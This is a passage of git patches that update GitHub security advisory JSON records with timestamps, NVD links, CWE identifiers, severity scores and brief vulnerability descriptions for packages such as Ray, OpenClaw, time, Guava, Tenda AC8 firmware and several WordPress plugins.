"modified": "2026-02-20T21:15:26Z", + "modified": "2026-02-23T22:30:32Z", "published": "2026-02-20T21:15:25Z", "aliases": [ "CVE-2026-27482" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/ray-project/ray/security/advisories/GHSA-q5fh-2hc8-f6rq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27482" + }, { "type": "WEB", "url": "https://github.com/ray-project/ray/pull/60526" @@ -59,11 +63,12 @@ ], "database_specific": { "cwe_ids": [ - "CWE-306" + "CWE-306", + "CWE-396" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:15:25Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json index e0bc2d82f86bd..09ffe62f28ac2 100644 --- a/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json +++ b/advisories/github-reviewed/2026/02/GHSA-qhp6-635j-x7r2/GHSA-qhp6-635j-x7r2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qhp6-635j-x7r2", - "modified": "2026-02-20T18:25:27Z", + "modified": "2026-02-23T22:28:57Z", "published": "2026-02-20T18:25:27Z", "aliases": [ "CVE-2026-27480" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/static-web-server/static-web-server/security/advisories/GHSA-qhp6-635j-x7r2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27480" + }, { "type": "WEB", "url": "https://github.com/static-web-server/static-web-server/commit/7bf0fd425eb10dac9bf9ef5febce12c4dd039ce1" @@ -56,6 +60,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T18:25:27Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json index 82b927d19e9a8..c368f518ef9a8 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json +++ b/advisories/github-reviewed/2026/02/GHSA-r6h2-5gqq-v5v6/GHSA-r6h2-5gqq-v5v6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r6h2-5gqq-v5v6", - "modified": "2026-02-20T21:05:45Z", + "modified": "2026-02-23T22:29:30Z", "published": "2026-02-20T21:05:45Z", "aliases": [ "CVE-2026-27485" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r6h2-5gqq-v5v6" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27485" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/pull/20796" @@ -71,6 +75,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:05:45Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json index 6ea03cb2a2cf4..bca4a647a6f96 100644 --- a/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json +++ b/advisories/github-reviewed/2026/02/GHSA-w45g-5746-x9fp/GHSA-w45g-5746-x9fp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w45g-5746-x9fp", - "modified": "2026-02-20T21:13:03Z", + "modified": "2026-02-23T22:29:47Z", "published": "2026-02-20T21:13:03Z", "aliases": [ "CVE-2026-27488" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w45g-5746-x9fp" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27488" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/99db4d13e5c139883ef0def9ff963e9273179655" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:13:03Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:13Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json index d50dfe80084d3..4f2786d42cc77 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json +++ b/advisories/github-reviewed/2026/02/GHSA-wh94-p5m6-mr7j/GHSA-wh94-p5m6-mr7j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wh94-p5m6-mr7j", - "modified": "2026-02-20T21:02:32Z", + "modified": "2026-02-23T22:29:14Z", "published": "2026-02-20T21:02:31Z", "aliases": [ "CVE-2026-27484" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wh94-p5m6-mr7j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27484" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/775816035ecc6bb243843f8000c9a58ff609e32d" @@ -60,6 +64,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-20T21:02:31Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-21T10:16:12Z" } } \ No newline at end of file From 661e2a198463f74d7895209eb98982338078e3ba Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:35:41 +0000 Subject: [PATCH 68/77] Publish GHSA-r6v5-fh4h-64xc --- .../2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json b/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json index c6a81e92e753f..29d0d85f24a44 100644 --- a/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json +++ b/advisories/github-reviewed/2026/02/GHSA-r6v5-fh4h-64xc/GHSA-r6v5-fh4h-64xc.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-r6v5-fh4h-64xc", - "modified": "2026-02-06T21:43:22Z", + "modified": "2026-02-23T22:34:23Z", "published": "2026-02-05T17:57:55Z", "aliases": [ "CVE-2026-25727" ], "summary": "time vulnerable to stack exhaustion Denial of Service attack", - "details": "### Impact\n\nWhen user-provided input is provided to any type that parses with the RFC 2822 format, a Denial of Service attack via stack exhaustion is possible. The attack relies on formally deprecated and rarely-used features that are part of the RFC 2822 format used in a malicious manner. Ordinary, non-malicious input will never encounter this scenario.\n\n### Patches\n\nA limit to the depth of recursion was added in v0.3.47. From this version, an error will be returned rather than exhausting the stack.\n\n### Workarounds\n\nLimiting the length of user input is the simplest way to avoid stack exhaustion, as the amount of the stack consumed would be at most a factor of the length of the input.", + "details": "### Impact\n\nWhen user-provided input is provided to any type that parses with the RFC 2822 format, a denial of service attack via stack exhaustion is possible. The attack relies on formally deprecated and rarely-used features that are part of the RFC 2822 format used in a malicious manner. Ordinary, non-malicious input will never encounter this scenario.\n\n### Patches\n\nA limit to the depth of recursion was added in v0.3.47. From this version, an error will be returned rather than exhausting the stack.\n\n### Workarounds\n\nLimiting the length of user input is the simplest way to avoid stack exhaustion, as the amount of the stack consumed would be at most a factor of the length of the input.\n\nAlternatively, avoiding the format altogether would also ensure that the vulnerability is not encountered. To do this, add\n\n```toml\ndisallowed-types = [\"time::format_description::well_known::Rfc2822\"]\n```\n\nto your `clippy.toml` file. This will trigger the `clippy::disallowed_types` lint, which is warn-by-default and can be explicitly denied.", "severity": [ { "type": "CVSS_V4", From 60eb5ccd67928d59d33978770a08537888461d89 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:40:16 +0000 Subject: [PATCH 69/77] Publish GHSA-mjjp-xjfg-97wg --- .../2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json b/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json index 97603d35e3f8a..c3eab04b2637f 100644 --- a/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json +++ b/advisories/github-reviewed/2026/01/GHSA-mjjp-xjfg-97wg/GHSA-mjjp-xjfg-97wg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mjjp-xjfg-97wg", - "modified": "2026-01-13T18:31:53Z", + "modified": "2026-02-23T22:38:58Z", "published": "2026-01-10T12:30:16Z", "aliases": [ "CVE-2025-15504" @@ -102,7 +102,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-404" + "CWE-404", + "CWE-476" ], "severity": "LOW", "github_reviewed": true, From cdb3c51acb704dfb758a686f1f832e683a6e2896 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:42:08 +0000 Subject: [PATCH 70/77] Publish GHSA-2g4f-4pwh-qvx6 --- .../2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json index b2ed54fec1747..d88bb33cb349a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2g4f-4pwh-qvx6", - "modified": "2026-02-20T20:59:11Z", + "modified": "2026-02-23T22:40:29Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69873" @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6" + }, { "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" @@ -90,6 +94,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1333", "CWE-400" ], "severity": "MODERATE", From 25b7d8a900fe5b11d53cc4b344df7396e8fbdc88 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:47:13 +0000 Subject: [PATCH 71/77] Publish GHSA-5mg8-w23w-74h3 --- .../2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json index 1c32e88eef1cb..a20e6bc61de8e 100644 --- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json +++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5mg8-w23w-74h3", - "modified": "2023-08-18T15:56:36Z", + "modified": "2026-02-23T22:45:53Z", "published": "2021-03-25T17:04:19Z", "aliases": [ "CVE-2020-8908" ], "summary": "Information Disclosure in Guava", - "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", + "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.", "severity": [ { "type": "CVSS_V3", From b6c5c521bd7037ac043dfa5e065a82e2d85dcc43 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 00:33:02 +0000 Subject: [PATCH 72/77] Advisory Database Sync --- .../GHSA-279c-6crv-5wxc.json | 11 +++- .../GHSA-2v7m-mcj3-m7h7.json | 11 +++- .../GHSA-2whc-3gm8-r8v3.json | 11 +++- .../GHSA-33jq-j95r-2gpj.json | 33 ++++++++++ .../GHSA-34rh-x3gg-rqg4.json | 60 +++++++++++++++++++ .../GHSA-3m9c-j7xc-gc2c.json | 56 +++++++++++++++++ .../GHSA-3r56-xx7r-cr9c.json | 11 +++- .../GHSA-43rm-rg7w-7rjf.json | 11 +++- .../GHSA-4fwr-9c58-jg7x.json | 11 +++- .../GHSA-4pmr-jmj5-4gwv.json | 11 +++- .../GHSA-5284-5qqc-v2w8.json | 11 +++- .../GHSA-57vf-72qj-2828.json | 11 +++- .../GHSA-5j3p-mg5x-539j.json | 11 +++- .../GHSA-63v8-38hf-jrfm.json | 11 +++- .../GHSA-6hhh-7cj8-7mp2.json | 47 +++++++++++++++ .../GHSA-76g3-wv5g-g883.json | 11 +++- .../GHSA-877x-j2fm-2mw5.json | 11 +++- .../GHSA-8p6j-8fq8-23rr.json | 11 +++- .../GHSA-972x-fv77-xf59.json | 56 +++++++++++++++++ .../GHSA-97g7-x3h6-6ccc.json | 11 +++- .../GHSA-9mr9-pcmg-4xr7.json | 11 +++- .../GHSA-9w4h-qf26-hvrv.json | 11 +++- .../GHSA-9xx2-jmjv-w5vp.json | 52 ++++++++++++++++ .../GHSA-cvm5-m63f-8wmv.json | 11 +++- .../GHSA-f6pr-2mv6-45fq.json | 11 +++- .../GHSA-fc39-6hhj-gr5p.json | 11 +++- .../GHSA-g3qj-5j85-8w2c.json | 11 +++- .../GHSA-gv3f-578r-jhf3.json | 11 +++- .../GHSA-h68v-wm52-cjcj.json | 34 +++++++++++ .../GHSA-hc97-m5vw-hgpf.json | 11 +++- .../GHSA-j69g-gh5p-j2j3.json | 11 +++- .../GHSA-jxq5-ggfq-q36w.json | 11 +++- .../GHSA-m78j-wv7w-r94w.json | 11 +++- .../GHSA-mhvh-7hfw-2pcj.json | 11 +++- .../GHSA-mq7f-f783-pc94.json | 11 +++- .../GHSA-mqj4-m7cg-hx46.json | 11 +++- .../GHSA-mvmh-gv2w-6hrm.json | 11 +++- .../GHSA-mvp7-2m2r-2548.json | 11 +++- .../GHSA-pf6r-4hv7-pr4f.json | 11 +++- .../GHSA-pj5w-7j3v-9wwv.json | 11 +++- .../GHSA-pjx3-8fqj-x6hr.json | 11 +++- .../GHSA-pq2q-m7vr-7342.json | 11 +++- .../GHSA-pqpv-94jx-68vg.json | 52 ++++++++++++++++ .../GHSA-qvmx-rqmx-pvfg.json | 35 +++++++++++ .../GHSA-r8fr-76pj-5h7j.json | 11 +++- .../GHSA-rg2h-mq39-66pf.json | 56 +++++++++++++++++ .../GHSA-rv4c-25xc-4f6g.json | 11 +++- .../GHSA-rw5q-r997-qm48.json | 11 +++- .../GHSA-v534-r4rj-rcvf.json | 11 +++- .../GHSA-vjvc-9fxm-2xw8.json | 11 +++- .../GHSA-vmmw-c3hw-gvm3.json | 33 ++++++++++ .../GHSA-vph5-6p6f-8xpf.json | 11 +++- .../GHSA-w7wv-fvvq-ppfp.json | 11 +++- .../GHSA-wf36-8q2p-m2xg.json | 11 +++- .../GHSA-wg93-hp69-vv5w.json | 44 ++++++++++++++ .../GHSA-x6m2-4qvv-ghf6.json | 11 +++- .../GHSA-xg7c-7v8p-8ww8.json | 11 +++- .../GHSA-xw6c-ffpm-fgcm.json | 44 ++++++++++++++ 58 files changed, 962 insertions(+), 135 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json diff --git a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json index 936fd65d0151c..f556811c9af31 100644 --- a/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json +++ b/advisories/unreviewed/2026/02/GHSA-279c-6crv-5wxc/GHSA-279c-6crv-5wxc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-279c-6crv-5wxc", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69390" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themebon Business Template Blocks for WPBakery (Visual Composer) Page Builder templates-and-addons-for-wpbakery-page-builder allows Reflected XSS.This issue affects Business Template Blocks for WPBakery (Visual Composer) Page Builder: from n/a through <= 1.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json index 5dfb584412d72..0e2ea26fb1574 100644 --- a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json +++ b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2v7m-mcj3-m7h7", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68842" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in totalbounty Widget Logic Visual widget-logic-visual allows Reflected XSS.This issue affects Widget Logic Visual: from n/a through <= 1.52.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:12Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json index 247b941cc007e..6b7983db0eb42 100644 --- a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json +++ b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2whc-3gm8-r8v3", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68844" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DaleAB Membee Login membees-member-login-widget allows Reflected XSS.This issue affects Membee Login: from n/a through <= 2.3.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json b/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json new file mode 100644 index 0000000000000..aff1e3b7028c3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33jq-j95r-2gpj", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3063" + ], + "details": "Inappropriate implementation in DevTools in Google Chrome prior to 145.0.7632.116 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via DevTools. (Chromium security severity: High)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3063" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/485287859" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json b/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json new file mode 100644 index 0000000000000..6c7ba2fa97c7b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34rh-x3gg-rqg4", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3041" + ], + "details": "A security vulnerability has been detected in xingfuggz BaykeShop up to 1.3.20. Impacted is an unknown function of the file src/baykeshop/contrib/article/templates/baykeshop/sidebar/custom.html of the component Article Sidebar Module. Such manipulation of the argument sidebar.content leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3041" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop/issues/1#issue-3931488211" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json b/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json new file mode 100644 index 0000000000000..9835dc7c9b4fc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m9c-j7xc-gc2c", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3044" + ], + "details": "A vulnerability has been found in Tenda AC8 16.03.34.06. This affects the function webCgiGetUploadFile of the file /cgi-bin/UploadCfg of the component Httpd Service. The manipulation of the argument boundary leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3044" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/43" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347400" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347400" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757240" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T00:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json index 6e09c9e1285cf..7061cbba02884 100644 --- a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json +++ b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3r56-xx7r-cr9c", - "modified": 